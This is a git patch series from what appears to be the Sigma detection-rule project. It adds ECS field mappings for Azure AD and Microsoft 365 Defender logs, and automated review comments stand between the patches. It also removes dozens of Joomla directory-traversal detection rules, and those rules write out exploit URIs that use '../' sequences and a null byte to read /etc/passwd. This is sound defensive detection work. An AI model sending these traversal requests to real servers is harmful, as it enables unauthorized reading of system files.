--- a/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml +++ b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml @@ -1,5 +1,5 @@ title: Process Dump via RdrLeakDiag.exe -id: EDADB1E5-5919-4E4C-8462-A9E643B02C4B +id: edadb1e5-5919-4e4c-8462-a9e643b02c4b description: Detects a process memory dump performed by RdrLeakDiag.exe status: experimental level: high @@ -16,7 +16,7 @@ logsource: detection: selection: OriginalFileName: RdrLeakDiag.exe - CommandLine|contains: - - 'fullmemdmp' + CommandLine|contains: fullmemdmp condition: selection -falsepositives: Unknown +falsepositives: + - Unknown From 9ca1ea993d846a0d297edb89de0cf58b0f216b49 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 19:29:40 -0500 Subject: [PATCH 1102/1367] Create ecs-azure-ad_signinlogs.yml --- tools/config/ecs-azure-ad_signinlogs.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 tools/config/ecs-azure-ad_signinlogs.yml diff --git a/tools/config/ecs-azure-ad_signinlogs.yml b/tools/config/ecs-azure-ad_signinlogs.yml new file mode 100644 index 00000000..d4728c6b --- /dev/null +++ b/tools/config/ecs-azure-ad_signinlogs.yml 
@@ -0,0 +1,20 @@ +title: Azure AD Signin Audit Logs Elasticsearch ecs mapping +order: 20 +backends: + - es-qs + - es-rule +fieldmappings: + category: azure.signinlogs.category + identity: azure.signinlogs.identity + riskDetail: azure.signinlogs.properties.risk_detail + riskLevelAggregated: azure.signinlogs.properties.risk_level_aggregated + riskLevelDuringSignIn: azure.signinlogs.properties.risk_level_during_signin + riskstate: azure.signinlogs.properties.risk_state + conditionalAccessStatus: azure.signinlogs.properties.conditional_access_status + resultType: azure.signinlogs.properties.status.error_code + ipAddress: azure.signinlogs.properties.ip_address + callerIpAddress: azure.signinlogs.properties.ip_address + properties.deviceDetail.deviceId: azure.signinlogs.properties.device_detail.device_id + properties.deviceDetail.operatingSystem: azure.signinlogs.properties.device_detail.operating_system + properties.deviceDetail.browser: azure.signinlogs.properties.device_detail.browser + properties.clientAppUsed: azure.signinlogs.properties.client_app_used From 527975c02f02d8da0febb913b1e106370ed834d8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 19:33:01 -0500 Subject: [PATCH 1103/1367] Update ecs-azure-ad_signinlogs.yml --- tools/config/ecs-azure-ad_signinlogs.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/config/ecs-azure-ad_signinlogs.yml b/tools/config/ecs-azure-ad_signinlogs.yml index d4728c6b..1fccca06 100644 --- a/tools/config/ecs-azure-ad_signinlogs.yml +++ b/tools/config/ecs-azure-ad_signinlogs.yml @@ -6,6 +6,7 @@ backends: fieldmappings: category: azure.signinlogs.category identity: azure.signinlogs.identity + resultSignature: azure.signinlogs.result_signature riskDetail: azure.signinlogs.properties.risk_detail riskLevelAggregated: azure.signinlogs.properties.risk_level_aggregated riskLevelDuringSignIn: azure.signinlogs.properties.risk_level_during_signin 
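Review bot: The `riskstate` key is written all lower case while the neighbouring keys (`riskDetail`, `riskLevelAggregated`) and the Azure sign-in log property itself use `riskState`; if sigmac matches mapping keys case-sensitively (verify), a rule written against the documented field name is not mapped, so the line should read `riskState: azure.signinlogs.properties.risk_state`. `ipAddress` and `callerIpAddress` both map to `azure.signinlogs.properties.ip_address`; if that is deliberate aliasing, a comment saying so would help the next reader. The file has no `logsources` block, so every mapping applies to every rule converted with this config.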
From dd2f3e50db5d9887887ceb0ebfdf635d06704b35 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 19:53:21 -0500 Subject: [PATCH 1104/1367] Create ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 tools/config/ecs-ms365_defender.yml diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml new file mode 100644 index 00000000..c9447407 --- /dev/null +++ b/tools/config/ecs-ms365_defender.yml @@ -0,0 +1,16 @@ +title: Microsoft 365 Defender Logs Elasticsearch ecs mapping +order: 20 +backends: + - es-qs + - es-rule +fieldmappings: + classification: microsoft.m365_defender.alerts.classification + determination: microsoft.m365_defender.alerts.determination + severity: microsoft.m365_defender.alerts.severity + status: microsoft.m365_defender.alerts.status + detectionSource: microsoft.m365_defender.alerts.detectionSource + threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName + registryHive: microsoft.m365_defender.alerts.entities.registryHive + registryKey: microsoft.m365_defender.alerts.entities.registryKey + registryValueType: microsoft.m365_defender.alerts.entities.registryValueType + ipAddress: microsoft.m365_defender.alerts.entities.ipAddress From 176b9662fca9f73773e3f9cf57068ee2b2632415 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 20:01:00 -0500 Subject: [PATCH 1105/1367] Update ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml index c9447407..2e6fee3a 100644 --- a/tools/config/ecs-ms365_defender.yml +++ b/tools/config/ecs-ms365_defender.yml 
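Review bot: This config and the `ecs-azure-ad_signinlogs.yml` created in PATCH 1102 both define an unscoped `ipAddress` field mapping with the same `order: 20` but pointing at different ECS fields; when both configs are passed to sigmac together, whichever is applied last silently wins, so one of them should be restricted with a `logsources` block as `auditbeat.yml` does, or the keys renamed. The same applies to the re-created copy of this file in PATCH 1107, which additionally ends with an empty added line. The keys here are camelCase (`detectionSource`, `threatFamilyName`) while the Azure config lowercases `riskstate`; settling one convention across the `ecs-*.yml` files would avoid mapping misses.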
@@ -10,6 +10,7 @@ fieldmappings: status: microsoft.m365_defender.alerts.status detectionSource: microsoft.m365_defender.alerts.detectionSource threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName + entityType: microsoft.m365_defender.alerts.entities.entityType registryHive: microsoft.m365_defender.alerts.entities.registryHive registryKey: microsoft.m365_defender.alerts.entities.registryKey registryValueType: microsoft.m365_defender.alerts.entities.registryValueType From 696f343ac3d3a93e64a9643d56d502de97ce6a83 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 24 Sep 2021 20:02:04 -0500 Subject: [PATCH 1106/1367] Delete ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 tools/config/ecs-ms365_defender.yml diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml deleted file mode 100644 index 2e6fee3a..00000000 --- a/tools/config/ecs-ms365_defender.yml +++ /dev/null @@ -1,17 +0,0 @@ -title: Microsoft 365 Defender Logs Elasticsearch ecs mapping -order: 20 -backends: - - es-qs - - es-rule -fieldmappings: - classification: microsoft.m365_defender.alerts.classification - determination: microsoft.m365_defender.alerts.determination - severity: microsoft.m365_defender.alerts.severity - status: microsoft.m365_defender.alerts.status - detectionSource: microsoft.m365_defender.alerts.detectionSource - threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName - entityType: microsoft.m365_defender.alerts.entities.entityType - registryHive: microsoft.m365_defender.alerts.entities.registryHive - registryKey: microsoft.m365_defender.alerts.entities.registryKey - registryValueType: microsoft.m365_defender.alerts.entities.registryValueType - ipAddress: microsoft.m365_defender.alerts.entities.ipAddress From 00f4773eeb79d1fc9611e0f6256263da4507f904 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Fri, 24 Sep 2021 20:02:39 -0500 Subject: [PATCH 1107/1367] Create ecs-ms365_defender.yml --- tools/config/ecs-ms365_defender.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 tools/config/ecs-ms365_defender.yml diff --git a/tools/config/ecs-ms365_defender.yml b/tools/config/ecs-ms365_defender.yml new file mode 100644 index 00000000..9bf97867 --- /dev/null +++ b/tools/config/ecs-ms365_defender.yml @@ -0,0 +1,18 @@ +title: Microsoft 365 Defender Elasticsearch ecs mapping +order: 20 +backends: + - es-qs + - es-rule +fieldmappings: + classification: microsoft.m365_defender.alerts.classification + determination: microsoft.m365_defender.alerts.determination + severity: microsoft.m365_defender.alerts.severity + status: microsoft.m365_defender.alerts.status + detectionSource: microsoft.m365_defender.alerts.detectionSource + threatFamilyName: microsoft.m365_defender.alerts.threatFamilyName + entityType: microsoft.m365_defender.alerts.entities.entityType + registryHive: microsoft.m365_defender.alerts.entities.registryHive + registryKey: microsoft.m365_defender.alerts.entities.registryKey + registryValueType: microsoft.m365_defender.alerts.entities.registryValueType + ipAddress: microsoft.m365_defender.alerts.entities.ipAddress + From 7c8df0eb5551d77ee9db6e8be621c9a2d42007a4 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Sat, 25 Sep 2021 08:05:00 +0700 Subject: [PATCH 1108/1367] Update web_cve_2021_22005_vmware_file_upload.yml --- rules/web/web_cve_2021_22005_vmware_file_upload.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload.yml b/rules/web/web_cve_2021_22005_vmware_file_upload.yml index c788d1da..c57ca266 100644 --- a/rules/web/web_cve_2021_22005_vmware_file_upload.yml +++ b/rules/web/web_cve_2021_22005_vmware_file_upload.yml 
@@ -15,8 +15,7 @@ logsource:
 detection:
 selection:
 cs-method: 'POST'
- c-uri|contains:
- - '/analytics/telemetry/ph/api/hyper/send?'
+ c-uri|contains: '/analytics/telemetry/ph/api/hyper/send?'
 condition: selection
 falsepositives:
 - Vulnerability Scanning/Pentesting
From 31ef53738d833035d53f5a330222199640748280 Mon Sep 17 00:00:00 2001
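Review bot: The trailing `?` in the new scalar value `'/analytics/telemetry/ph/api/hyper/send?'` is a Sigma single-character wildcard, not the literal query-string delimiter, so with `|contains` the selection requires only that some character follow `send` and does not check for `?` at all (a request to `.../hyper/send/x` matches, a bare `.../hyper/send` does not). If the `?` is meant literally, escape it as `c-uri|contains: '/analytics/telemetry/ph/api/hyper/send\?'`; if it is not needed, drop it and match on `'/analytics/telemetry/ph/api/hyper/send'` so the intent is explicit. The unnesting itself is behaviour-neutral; the `logsource` block above the hunk starts outside it.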
From: Florian Roth Date: Sat, 25 Sep 2021 11:37:02 +0200 Subject: [PATCH 1109/1367] refactor: removed old Joomla rules, made generic path traversal --- ...web_cve_2010_0943_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_0944_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_0985_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1219_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1304_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1305_exploitation_attempt.yml | 27 ------------------- ...web_cve_2010_1306_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1307_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1308_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1312_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1313_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1314_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1345_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1353_exploitation_attempt.yml | 25 ----------------- ...web_cve_2010_1354_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1470_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1471_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1472_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1473_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1474_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1475_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1476_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1494_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1495_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1532_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1533_exploitation_attempt.yml | 26 ------------------ 
...web_cve_2010_1534_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1535_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1601_exploitation_attempt.yml | 25 ----------------- ...web_cve_2010_1602_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1607_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1657_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1659_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1714_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1717_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1718_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1719_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1722_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1875_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1953_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1954_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1955_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1956_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1979_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1980_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1981_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_1983_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2033_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2034_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2035_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2036_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2122_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2259_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2307_exploitation_attempt.yml | 27 ------------------- 
...web_cve_2010_2682_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_2861_exploitation_attempt.yml | 27 ------------------- ...web_cve_2010_2920_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_3426_exploitation_attempt.yml | 26 ------------------ ...web_cve_2010_4231_exploitation_attempt.yml | 25 ----------------- ...web_cve_2010_4617_exploitation_attempt.yml | 26 ------------------ ...eb_path_traversal_exploitation_attempt.yml | 26 ++++++++++++++++++ 61 files changed, 26 insertions(+), 1560 deletions(-) delete mode 100644 rules/web/web_cve_2010_0943_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_0944_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_0985_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1219_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1304_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1305_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1306_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1307_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1308_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1312_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1313_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1314_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1345_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1353_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1354_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1470_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1471_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1472_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1473_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1474_exploitation_attempt.yml delete mode 
100644 rules/web/web_cve_2010_1475_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1476_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1494_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1495_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1532_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1533_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1534_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1535_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1601_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1602_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1607_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1657_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1659_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1714_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1717_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1718_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1719_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1722_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1875_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1953_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1954_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1955_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1956_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1979_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1980_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1981_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1983_exploitation_attempt.yml delete mode 100644 
rules/web/web_cve_2010_2033_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2034_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2035_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2036_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2122_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2259_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2307_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2682_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2861_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2920_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_3426_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_4231_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_4617_exploitation_attempt.yml create mode 100644 rules/web/web_path_traversal_exploitation_attempt.yml diff --git a/rules/web/web_cve_2010_0943_exploitation_attempt.yml b/rules/web/web_cve_2010_0943_exploitation_attempt.yml deleted file mode 100644 index fb5bfcbf..00000000 --- a/rules/web/web_cve_2010_0943_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-0943 Exploitation Attempt -id: f28d6faa-4163-4967-b397-414aab6cbe41 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_jashowcase - Directory Traversal:Directory traversal - vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - in a jashowcase action to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_0944_exploitation_attempt.yml b/rules/web/web_cve_2010_0944_exploitation_attempt.yml deleted file mode 100644 index f33fd3a7..00000000 --- a/rules/web/web_cve_2010_0944_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-0944 Exploitation Attempt -id: 55d082fa-118a-4649-8e06-bf342de0ba84 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_jcollection - Directory Traversal:Directory traversal - vulnerability in the JCollection (com_jcollection) component for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_0985_exploitation_attempt.yml b/rules/web/web_cve_2010_0985_exploitation_attempt.yml deleted file mode 100644 index 22a45c28..00000000 --- a/rules/web/web_cve_2010_0985_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-0985 Exploitation Attempt -id: 624c389f-24aa-44c2-b702-c2b58eb18ff9 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_abbrev - Local File Inclusion:Directory traversal - vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! - allows remote attackers to include and execute arbitrary local files via a .. (dot - dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1219_exploitation_attempt.yml b/rules/web/web_cve_2010_1219_exploitation_attempt.yml deleted file mode 100644 index 4a23c671..00000000 --- a/rules/web/web_cve_2010_1219_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1219 Exploitation Attempt -id: c05d288c-1f70-4090-8f86-9739afedb14b -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_janews - Local File Inclusion:Directory traversal - vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote - attackers to read arbitrary local files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1304_exploitation_attempt.yml b/rules/web/web_cve_2010_1304_exploitation_attempt.yml deleted file mode 100644 index f848a240..00000000 --- a/rules/web/web_cve_2010_1304_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1304 Exploitation Attempt -id: 6bc9b1ee-a560-4944-84d7-02d45d99cdb1 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component User Status - Local File Inclusion:Directory traversal - vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1305_exploitation_attempt.yml b/rules/web/web_cve_2010_1305_exploitation_attempt.yml deleted file mode 100644 index 77a6a40c..00000000 --- a/rules/web/web_cve_2010_1305_exploitation_attempt.yml +++ /dev/null 
@@ -1,27 +0,0 @@ -title: CVE-2010-1305 Exploitation Attempt -id: 4c450e3e-b786-4bf6-bbf4-f2f44546d61e -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component JInventory 1.23.02 - Local File Inclusion:Directory - traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component - 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1306_exploitation_attempt.yml b/rules/web/web_cve_2010_1306_exploitation_attempt.yml deleted file mode 100644 index 1d0a373d..00000000 --- a/rules/web/web_cve_2010_1306_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1306 Exploitation Attempt -id: 613ccec4-9812-4cc7-a2f5-bf88383cf83d -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Picasa 2.0 - Local File Inclusion:Directory traversal - vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! - allows remote attackers to read arbitrary local files via a .. (dot dot) in the - controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1307_exploitation_attempt.yml b/rules/web/web_cve_2010_1307_exploitation_attempt.yml deleted file mode 100644 index cff57926..00000000 --- a/rules/web/web_cve_2010_1307_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1307 Exploitation Attempt -id: d2bcd27a-de8c-465b-889a-62588138feaa -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Magic Updater - Local File Inclusion:Directory traversal - vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical 
diff --git a/rules/web/web_cve_2010_1308_exploitation_attempt.yml b/rules/web/web_cve_2010_1308_exploitation_attempt.yml deleted file mode 100644 index 52c29e67..00000000 --- a/rules/web/web_cve_2010_1308_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1308 Exploitation Attempt -id: 4cf2d8e5-2b82-484e-b412-bb5fcfb519eb -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component SVMap 1.1.1 - Local File Inclusion:Directory traversal - vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1312_exploitation_attempt.yml b/rules/web/web_cve_2010_1312_exploitation_attempt.yml deleted file mode 100644 index 65aa281a..00000000 --- a/rules/web/web_cve_2010_1312_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1312 Exploitation Attempt -id: fc07dc98-780f-4493-98ce-6e1b7c9742e2 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component News Portal 1.5.x - Local File Inclusion:Directory - traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1313_exploitation_attempt.yml b/rules/web/web_cve_2010_1313_exploitation_attempt.yml deleted file mode 100644 index cc836644..00000000 --- a/rules/web/web_cve_2010_1313_exploitation_attempt.yml +++ /dev/null 
